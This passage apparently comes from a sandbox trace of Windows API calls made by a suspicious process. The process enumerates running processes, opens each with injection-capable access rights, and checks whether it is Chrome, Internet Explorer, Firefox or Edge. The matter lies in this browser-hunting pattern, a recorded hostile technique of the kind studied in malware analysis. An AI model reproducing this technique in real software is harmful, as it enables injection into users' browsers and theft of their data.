	[0236.051] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x76e8
	[0236.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.051] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.051] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.051] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.052] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.052] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.052] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.053] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x76ec
	[0236.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.053] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.053] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.053] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.054] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.054] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0236.055] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x76f0
	[0236.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.055] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0236.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.055] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.055] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0236.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.056] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.056] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.057] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x76f4
	[0236.057] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.057] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.057] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.057] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.058] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.058] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.058] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0236.059] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x76f8
	[0236.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.059] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.059] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.060] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.061] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.061] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.061] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0236.062] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x76fc
	[0236.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.062] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0236.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.062] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.062] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0236.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.063] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.063] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.064] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x7700
	[0236.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.064] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.064] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.064] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.065] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.065] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0236.066] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x7704
	[0236.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.066] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0236.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.066] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.066] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0236.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.067] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.067] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0236.068] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x7708
	[0236.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.068] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0236.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.068] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.068] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0236.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.069] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.069] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0236.070] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x770c
	[0236.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.070] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0236.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.070] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.070] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0236.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.071] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.071] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0236.071] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x7710
	[0236.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.072] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0236.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.072] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.072] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0236.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.073] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.073] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0236.074] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0236.074] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0236.074] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x7714
	[0236.074] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.075] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0236.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.075] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.078] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.078] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0236.078] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.078] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.079] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0236.079] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x7718
	[0236.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.079] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0236.080] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.080] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.080] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.080] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0236.080] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.080] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.081] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0236.081] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x771c
	[0236.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.081] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0236.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.082] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.082] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0236.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.082] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.083] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0236.083] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x7720
	[0236.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.084] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0236.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.084] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.084] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0236.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.085] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.085] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0236.086] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x7724
	[0236.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.086] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0236.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.086] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.087] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0236.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.087] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.088] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0236.088] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x7728
	[0236.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.089] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0236.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.089] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.089] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0236.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.089] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.090] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0236.090] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x772c
	[0236.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.090] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0236.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.095] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.095] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0236.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.096] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.096] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0236.097] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x7730
	[0236.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.097] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0236.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.098] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.098] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0236.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.099] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.099] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0236.100] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x7734
	[0236.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.100] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0236.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.100] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.101] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0236.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.101] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.101] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0236.102] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x7738
	[0236.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.102] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0236.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.102] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.102] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0236.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.103] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.103] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0236.104] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x773c
	[0236.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.104] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0236.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.104] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.105] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0236.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.105] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.105] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0236.106] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x7740
	[0236.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.107] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0236.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.108] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.108] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0236.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.109] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.109] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0236.110] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x7744
	[0236.110] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.110] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0236.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.111] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.111] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0236.112] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.112] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.112] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0236.113] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x7748
	[0236.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.113] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0236.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
